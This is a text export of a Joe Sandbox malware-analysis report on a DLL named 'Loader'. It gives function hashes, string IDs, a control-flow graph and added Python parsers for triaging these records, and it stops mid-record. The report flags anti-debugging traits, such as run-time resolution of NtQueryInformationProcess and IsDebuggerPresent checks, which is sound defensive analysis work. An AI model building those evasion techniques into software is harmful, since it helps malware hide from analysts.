                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3231365870-0
                                                                                                                                                                                                                                                                  • Opcode ID: 028287878c3f252ac36ecad29fd3996f61009d802e51a37870a45df5a8d054f0
                                                                                                                                                                                                                                                                  • Instruction ID: 82e235dbdaa49722330e9898c1f640d513590f017639cb004df9805443588f6a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028287878c3f252ac36ecad29fd3996f61009d802e51a37870a45df5a8d054f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7221DE32649A11AEDB04EBB8B4017ECB771AF0632CF30884DD88067FC2CB365149D6E6
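Every function on this page is described by the same fixed record: a Source File line carrying the module offset, the Associated dumps, the Snapshot File, then the Similarity block with API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes. The Python below is an added example, not Joe Sandbox code, that parses those records out of a text export of this report, strips the "Download File" link labels that the export fuses onto file names, and flags functions whose String IDs name native APIs, as the record above that lists NtQueryInformationProcess and ntdll.dll with no imported API ID does. The sample records are copied from this page. Only the base-address field of the .sdmp names is confirmed by the report (it matches the Source line); reading the fifth and seventh fields as the page protection and memory type of the dumped region is an assumption made here that fits every dump listed on this page.

```python
"""Parse the per-function "Memory Dump Source" / "Similarity" records of a Joe Sandbox
report export and flag functions whose String IDs name native (ntdll) APIs.
Added example, not Joe Sandbox code. The record layout and SAMPLE come from this
report; decoding of the .sdmp name fields beyond the base address is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied from this report, the first naming
# NtQueryInformationProcess / ntdll.dll, the second the CRT DllMain dispatcher.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: $|&|$$|&|$NtQueryInformationProcess$[3.5$`gH$`gH$ntdll.dll$x5Zr$x5Zr
• API String ID: 0-1907433695
• Opcode ID: 6a3de3096ddca1517a85b395a26e16f33202c3c922e5847cfb87d915748dac9d
• Instruction Fuzzy Hash: 9E923336A442018FDB08CEBCD5A63CE7BF2AB47318F348519E415DBB94D22E990BCB55
APIs
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: 2fd5e25e168075f962f0d09e985b328b5c63c9465f90288e59ff7d7f5970064e
• Instruction Fuzzy Hash: 9821BF71D01E68AACB21CE55EC44ABFBA79EB81B9CF318519F81567B50D3318D418BD0
"""

_LINK_SUFFIX = "Download File"  # link label fused onto file names in the text export
_SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
_PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_IMAGE = 0x01000000
_NATIVE_RE = re.compile(r"^(Nt|Zw)[A-Z][A-Za-z0-9]+$")


@dataclass
class FunctionRecord:
    source_file: str = ""
    module_base: Optional[int] = None  # the "Offset:" value on the Source File line
    associated: List[str] = field(default_factory=list)
    snapshot: str = ""
    api_ids: List[str] = field(default_factory=list)
    string_ids: List[str] = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""


def _split_ids(value: str) -> List[str]:
    # Joe Sandbox joins IDs with '$'; separators next to binary junk leave empty parts.
    return [part for part in value.split("$") if part]


def parse_records(text: str) -> List[FunctionRecord]:
    """One record starts at each 'Memory Dump Source' line; key: value bullets fill it."""
    records: List[FunctionRecord] = []
    rec: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()  # drop the bullet glyph
        if line == "Memory Dump Source":
            rec = FunctionRecord()
            records.append(rec)
            continue
        if rec is None or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            rec.source_file = value.split(",")[0].strip()
            m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", value)
            rec.module_base = int(m.group(1), 16) if m else None
        elif key == "Associated":
            if value.endswith(_LINK_SUFFIX):
                value = value[: -len(_LINK_SUFFIX)]
            rec.associated.append(value)
        elif key == "Snapshot File":
            rec.snapshot = value
        elif key == "API ID":
            rec.api_ids = _split_ids(value)
        elif key == "String ID":
            rec.string_ids = _split_ids(value)
        elif key == "API String ID":
            rec.api_string_id = value
        elif key == "Opcode ID":
            rec.opcode_id = value
        elif key == "Instruction ID":
            rec.instruction_id = value
        elif key == "Opcode Fuzzy Hash":
            rec.opcode_fuzzy = value
        elif key == "Instruction Fuzzy Hash":
            rec.instruction_fuzzy = value
    return records


def decode_sdmp_name(name: str) -> Dict[str, object]:
    """Split a dump-file name into fields. ASSUMPTION: field 5 is the region's page
    protection and field 7 its memory type (0x01000000 = MEM_IMAGE); only the base
    address (field 4) is confirmed by the report text."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect = int(m.group(5), 16)
    mem_type = int(m.group(7), 16)
    return {"process": int(m.group(1)), "base": int(m.group(4), 16),
            "protect": _PAGE_PROTECT.get(protect, hex(protect)),
            "is_image": bool(mem_type & MEM_IMAGE)}


def native_api_refs(rec: FunctionRecord) -> List[str]:
    """Strings naming an Nt*/Zw* export or ntdll itself: in a function that imports no
    API (empty API ID) they point at run-time resolution of native calls."""
    return [s for s in rec.string_ids
            if _NATIVE_RE.match(s) or s.lower().endswith("ntdll.dll")]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        info = decode_sdmp_name(rec.source_file)
        print(rec.opcode_id[:16], hex(info["base"]), info["protect"],
              "apis=", rec.api_ids, "native=", native_api_refs(rec))
```

Run over a whole report export, the records with an empty API ID but a non-empty native_api_refs list are the ones to open first; the CRT start-up functions (dllmain_raw, __RTC_Initialize, ___scrt_*) parse cleanly but carry nothing sample-specific.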

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 1743 6ce395f0-6ce3963e 1744 6ce39645-6ce39650 1743->1744 1745 6ce39656-6ce39663 1744->1745 1746 6ce3a548-6ce3a552 1744->1746 1749 6ce3a557-6ce3a55e 1745->1749 1750 6ce39669-6ce39676 1745->1750 1748 6ce3a59e 1746->1748 1748->1744 1749->1748 1752 6ce3a3d0-6ce3a411 1750->1752 1753 6ce3967c-6ce39689 1750->1753 1752->1748 1755 6ce39b88-6ce39b8f 1753->1755 1756 6ce3968f-6ce3969c 1753->1756 1755->1748 1758 6ce396a2-6ce396af 1756->1758 1759 6ce3a439-6ce3a443 1756->1759 1761 6ce3a272-6ce3a281 1758->1761 1762 6ce396b5-6ce396c2 1758->1762 1759->1748 1761->1748 1764 6ce3a416-6ce3a41d 1762->1764 1765 6ce396c8-6ce396d5 1762->1765 1764->1748 1767 6ce3a563-6ce3a56a 1765->1767 1768 6ce396db-6ce396e8 1765->1768 1767->1748 1770 6ce3a056-6ce3a05d 1768->1770 1771 6ce396ee-6ce396fb 1768->1771 1770->1748 1773 6ce3a1f1-6ce3a207 1771->1773 1774 6ce39701-6ce3970e 1771->1774 1773->1748 1776 6ce39714-6ce39721 1774->1776 1777 6ce39a3c-6ce39a8b 1774->1777 1779 6ce39727-6ce39734 1776->1779 1780 6ce3a448-6ce3a4b6 1776->1780 1777->1748 1782 6ce3973a-6ce39747 1779->1782 1783 6ce3a21e-6ce3a22d 1779->1783 1780->1748 1785 6ce39a90-6ce39a97 1782->1785 1786 6ce3974d-6ce3975a 1782->1786 1783->1748 1785->1748 1788 6ce3a232-6ce3a24d call 6ce3bfc0 1786->1788 1789 6ce39760-6ce3976d 1786->1789 1788->1748 1792 6ce39773-6ce39780 1789->1792 1793 6ce3a519-6ce3a520 1789->1793 1796 6ce39786-6ce39793 1792->1796 1797 6ce3a53c-6ce3a543 1792->1797 1793->1748 1799 6ce3a57b-6ce3a582 1796->1799 1800 6ce39799-6ce397a6 1796->1800 1797->1748 1799->1748 1802 6ce39d33-6ce39d3a 1800->1802 1803 6ce397ac-6ce397b9 1800->1803 1802->1748 1805 6ce39b94-6ce39bfa 1803->1805 1806 6ce397bf-6ce397cc 1803->1806 1805->1748 1808 6ce397d2-6ce397df 1806->1808 1809 6ce3a35d-6ce3a3cb 1806->1809 1811 6ce397e5-6ce397f2 1808->1811 1812 6ce3a56f-6ce3a576 1808->1812 1809->1748 1814 6ce397f8-6ce39805 1811->1814 1815 6ce39a9c-6ce39b0a 1811->1815 1812->1748 1817 6ce39d85-6ce39df3 1814->1817 1818 6ce3980b-6ce39818 1814->1818 1815->1748 1817->1748 1820 6ce3a0a8-6ce3a106 call 6ce31740 1818->1820 1821 6ce3981e-6ce3982b 1818->1821 1820->1748 1825 6ce39831-6ce3983e 1821->1825 1826 6ce3a587-6ce3a597 call 6ce31740 1821->1826 1830 6ce3a286-6ce3a2c7 1825->1830 1831 6ce39844-6ce39851 1825->1831 1826->1748 1830->1748 1833 6ce39857-6ce39864 1831->1833 1834 6ce3a10b-6ce3a179 1831->1834 1836 6ce39e63-6ce39ed1 1833->1836 1837 6ce3986a-6ce39877 1833->1837 1834->1748 1836->1748 1839 6ce3a266-6ce3a26d 1837->1839 1840 6ce3987d-6ce3988a 1837->1840 1839->1748 1842 6ce39890-6ce3989d 1840->1842 1843 6ce39d3f-6ce39d80 1840->1843 1845 6ce398a3-6ce398b0 1842->1845 1846 6ce39ed6-6ce39f25 1842->1846 1843->1748 1848 6ce39a16-6ce39a37 1845->1848 1849 6ce398b6-6ce398c3 1845->1849 1846->1748 1848->1748 1851 6ce398c9-6ce398d6 1849->1851 1852 6ce3a17e-6ce3a1ec 1849->1852 1854 6ce3a422-6ce3a434 1851->1854 1855 6ce398dc-6ce398e9 1851->1855 1852->1748 1854->1748 1857 6ce3a010-6ce3a051 1855->1857 1858 6ce398ef-6ce398fc 1855->1858 1857->1748 1860 6ce39902-6ce3990f 1858->1860 1861 6ce3a351-6ce3a358 1858->1861 1863 6ce39c72-6ce39cc3 1860->1863 1864 6ce39915-6ce39922 1860->1864 1861->1748 1863->1748 1866 6ce3a4bb-6ce3a514 call 6ce31740 1864->1866 1867 6ce39928-6ce39935 1864->1867 1866->1748 1870 6ce3a525-6ce3a537 1867->1870 1871 6ce3993b-6ce39948 1867->1871 1870->1748 1874 6ce39cc8-6ce39d2e 1871->1874 1875 6ce3994e-6ce3995b 1871->1875 1874->1748 1877 6ce39961-6ce3996e 1875->1877 1878 6ce3a2cc-6ce3a332 1875->1878 1880 6ce39974-6ce39981 1877->1880 1881 6ce39f9d-6ce3a00b 1877->1881 1878->1748 1883 6ce39987-6ce39994 1880->1883 1884 6ce3a20c-6ce3a219 1880->1884 1881->1748 1886 6ce3a337-6ce3a350 call 6ce4e890 1883->1886 1887 6ce3999a-6ce399a7 1883->1887 1884->1748 1891 6ce3a062-6ce3a0a3 1887->1891 1892 6ce399ad-6ce399ba 1887->1892 1891->1748 1894 6ce399c0-6ce399cd 1892->1894 1895 6ce39f2a-6ce39f98 1892->1895 1897 6ce399d3-6ce399e0 1894->1897 1898 6ce39bff-6ce39c6d 1894->1898 1895->1748 1900 6ce399e6-6ce399f3 1897->1900 1901 6ce39df8-6ce39e5e 1897->1901 1898->1748 1903 6ce399f9-6ce39a06 1900->1903 1904 6ce39b0f-6ce39b83 1900->1904 1901->1748 1906 6ce3a252-6ce3a261 1903->1906 1907 6ce39a0c-6ce39a11 1903->1907 1904->1748 1906->1748 1907->1748
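The control_flow_graph listings on this page are flattened edge lists: each basic block appears as an integer id, an address or address range, any "call <addr>" targets and symbol names the block touches (dllmain_raw, dllmain_crt_dispatch), followed by id->id edges. The Python below is an added example, not Joe Sandbox code, that parses that format, finds entry and exit blocks, maps a stack address to the block containing it (the 6CE4EB67 return address in the InitializeSListHead call stack listed above lands in the dllmain_crt_dispatch block of the 6ce4eb0e graph), and lists the join points that many paths converge on; on the 6ce395f0 graph just above, that check picks out block 1748, which nearly every block flows into and which loops back to 1744. The embedded sample is the 6ce4eb0e DllMain graph from this page; the helper names are this example's own.

```python
"""Parse the flattened control_flow_graph listings Joe Sandbox prints under each
function (block id, address range, `call <addr>` targets and symbol names, then
`<id>-><id>` edges) and answer the questions a triager asks of such a graph.
Added example, not Joe Sandbox code; SAMPLE is the 6ce4eb0e DllMain graph from
this report, embedded so the script runs offline."""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SAMPLE = (
    "control_flow_graph 1544 6ce4eb0e-6ce4eb1f call 6ce4f310 1547 6ce4eb30-6ce4eb37 "
    "1544->1547 1548 6ce4eb21-6ce4eb27 1544->1548 1550 6ce4eb43-6ce4eb57 dllmain_raw "
    "1547->1550 1551 6ce4eb39-6ce4eb3c 1547->1551 1548->1547 1549 6ce4eb29-6ce4eb2b "
    "1548->1549 1552 6ce4ec09-6ce4ec18 1549->1552 1554 6ce4ec00-6ce4ec07 1550->1554 "
    "1555 6ce4eb5d-6ce4eb6e dllmain_crt_dispatch 1550->1555 1551->1550 "
    "1553 6ce4eb3e-6ce4eb41 1551->1553 1556 6ce4eb74-6ce4eb86 call 6ce2e500 1553->1556 "
    "1554->1552 1555->1554 1555->1556 1559 6ce4ebaf-6ce4ebb1 1556->1559 "
    "1560 6ce4eb88-6ce4eb8a 1556->1560 1561 6ce4ebb3-6ce4ebb6 1559->1561 "
    "1562 6ce4ebb8-6ce4ebc9 dllmain_crt_dispatch 1559->1562 1560->1559 "
    "1563 6ce4eb8c-6ce4ebaa call 6ce2e500 call 6ce4ea5e dllmain_raw 1560->1563 "
    "1561->1554 1561->1562 1562->1554 1564 6ce4ebcb-6ce4ebfd dllmain_raw 1562->1564 "
    "1563->1559 1564->1554"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
RANGE_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: List[int] = field(default_factory=list)    # targets of `call <addr>` tokens
    symbols: List[str] = field(default_factory=list)  # named routines the block references


@dataclass
class CFG:
    blocks: Dict[int, Block]
    edges: List[Tuple[int, int]]

    def preds(self, bid: int) -> List[int]:
        return [a for a, b in self.edges if b == bid]

    def succs(self, bid: int) -> List[int]:
        return [b for a, b in self.edges if a == bid]


def parse_cfg(text: str) -> CFG:
    """A bare integer token opens a block and is always followed by its address (range),
    so the listing parses with one token of look-ahead and no further state."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[Block] = None
    i = 0
    while i < len(toks):
        tok = toks[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif ID_RE.match(tok):
            rng = RANGE_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
            if not rng:
                raise ValueError(f"block {tok} has no address range")
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start  # single-address block
            cur = Block(int(tok), start, end)
            blocks[cur.bid] = cur
            i += 2
        elif tok == "call":
            if cur is None or i + 1 >= len(toks):
                raise ValueError("call target outside a block")
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        else:
            if cur is None:
                raise ValueError(f"symbol {tok!r} before any block")
            cur.symbols.append(tok)
            i += 1
    return CFG(blocks, edges)


def entry_blocks(cfg: CFG) -> List[int]:
    return sorted(b for b in cfg.blocks if not cfg.preds(b))


def exit_blocks(cfg: CFG) -> List[int]:
    return sorted(b for b in cfg.blocks if not cfg.succs(b))


def blocks_referencing(cfg: CFG, symbol: str) -> List[int]:
    return sorted(b.bid for b in cfg.blocks.values() if symbol in b.symbols)


def block_at(cfg: CFG, addr: int) -> Optional[int]:
    """Map an address (e.g. a return address from a call stack) to its basic block."""
    for b in cfg.blocks.values():
        if b.start <= addr <= b.end:
            return b.bid
    return None


def reachable(cfg: CFG, start: int) -> Set[int]:
    seen, todo = {start}, deque([start])
    while todo:
        for s in cfg.succs(todo.popleft()):
            if s not in seen:
                seen.add(s)
                todo.append(s)
    return seen


def join_points(cfg: CFG, min_preds: int = 3) -> List[int]:
    """Blocks that many paths converge on; a sink that loops back to the head of the
    function is the shape to check by hand for a dispatcher loop."""
    return sorted(b for b in cfg.blocks if len(cfg.preds(b)) >= min_preds)


if __name__ == "__main__":
    g = parse_cfg(SAMPLE)
    print(len(g.blocks), "blocks,", len(g.edges), "edges")
    print("entry", entry_blocks(g), "exits", exit_blocks(g))
    print("dllmain_raw referenced in", blocks_referencing(g, "dllmain_raw"))
    print("0x6ce4eb67 lies in block", block_at(g, 0x6CE4EB67))
    print("join points", join_points(g, 3))
```

Paste any other listing from this page into parse_cfg to get the same summary; blocks that reachable() never visits from the entry are worth a look, since the graph text alone does not say which blocks ran.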
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 'Yo$'Yo$2Jt$2Jt$Z 's$nVy$xvT$xvT$j$}UF$}UF
                                                                                                                                                                                                                                                                  • API String ID: 0-1983602203
                                                                                                                                                                                                                                                                  • Opcode ID: cae4f05471c395d1cb1801c460a0cd9991d7a7ee359494d81527009ec19e78de
                                                                                                                                                                                                                                                                  • Instruction ID: f5cf27e6b1f453dd4ce552c30792852472973ab3e9903c4f13149ae097c314c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cae4f05471c395d1cb1801c460a0cd9991d7a7ee359494d81527009ec19e78de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03822836A856619FCF08CEBCD4D53DE3BF2AB47324F306619D815DB794C62A984ACB40
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 'Gu{$'Gu{$5Q@$^L4q$^L4q$Tc$Tc
                                                                                                                                                                                                                                                                  • API String ID: 0-3390853983
                                                                                                                                                                                                                                                                  • Opcode ID: c5c73f50a3d88c30700c0d6a0a0bfa649bb9427eba225fa01a5cd068d28d1cdd
                                                                                                                                                                                                                                                                  • Instruction ID: 52e3b026bcad43ff899eb9f1969ddf0bf6e2f990002e3d60c9d9c36e632d8169
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5c73f50a3d88c30700c0d6a0a0bfa649bb9427eba225fa01a5cd068d28d1cdd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B2F276E406258FCF04CEBCC9953DE7BF2AB4B314F20A519D41ADB794C626A90ACF41
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #/$M+n$M+n$a.X($u!uw
                                                                                                                                                                                                                                                                  • API String ID: 0-2600747074
                                                                                                                                                                                                                                                                  • Opcode ID: ecc7e70ad4f9566a81d4180e8b17227798390ef51d89847c7995a87468ad00a4
                                                                                                                                                                                                                                                                  • Instruction ID: 3aba437b347d3dec34b94ea42c68d62e8b620562eeb4cf48f62001c6a46f2add
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc7e70ad4f9566a81d4180e8b17227798390ef51d89847c7995a87468ad00a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E24636A446508FCF08CEBCD9D53CD77F6AB47324F21A519D829DB794C63AA80ACB44
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (q/$(q/$1GLs$1GLs$J^$J^
                                                                                                                                                                                                                                                                  • API String ID: 0-2601102989
                                                                                                                                                                                                                                                                  • Opcode ID: 579473730d469b3f2439c8ec6628559b38f1f00048ff66887e82e23797f2fc3e
                                                                                                                                                                                                                                                                  • Instruction ID: c6cb5e4106b234205d6bd00b2ea9ea99a50e74d1ca5373dd42c5d734c9b0c9ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 579473730d469b3f2439c8ec6628559b38f1f00048ff66887e82e23797f2fc3e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F1F236B452018FDB08CEBCE5D53DD77F2AB5B364F30D516D420E7B94D22A8A0A8B58
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: }@UF$}@UF
                                                                                                                                                                                                                                                                  • API String ID: 0-3815369809
                                                                                                                                                                                                                                                                  • Opcode ID: 511f645fc5b5a007a2a3d2c16820c3adac51898de93e295e172966bd58e4b73f
                                                                                                                                                                                                                                                                  • Instruction ID: dccfb60f99cfb923c94704fb91e3bf72a4ce443e118497f1f800862077ed5621
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 511f645fc5b5a007a2a3d2c16820c3adac51898de93e295e172966bd58e4b73f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E961F176E041128FDF04CEBCC1943DE77B1AB57318F3462059429DB794CB3AAA46CBA5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
• String ID: 3]'$3]'$bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch$mag#$mag#
• API String ID: 0-574533846
• Opcode ID: 3014ad46f99848b6691db9f6123549e2519d124a4b5f12adca82e5626f9abc76
• Instruction ID: c57b558a2303960562045a83225ccd9918b018025e3e1900a553c9b7397bf114
• Opcode Fuzzy Hash: 3014ad46f99848b6691db9f6123549e2519d124a4b5f12adca82e5626f9abc76
• Instruction Fuzzy Hash: DE525A32318B018FC718CE7CD5917DA37F3AB53364F209A19D466C7F94D62AE51A8B41
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE51774
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE5177E
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE5178B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: ,Ql
• API String ID: 3906539128-1692949582
• Opcode ID: e10657d94043f350d030f79680e812eb5c1785047af2d11c2fd8dcd0e080ae84
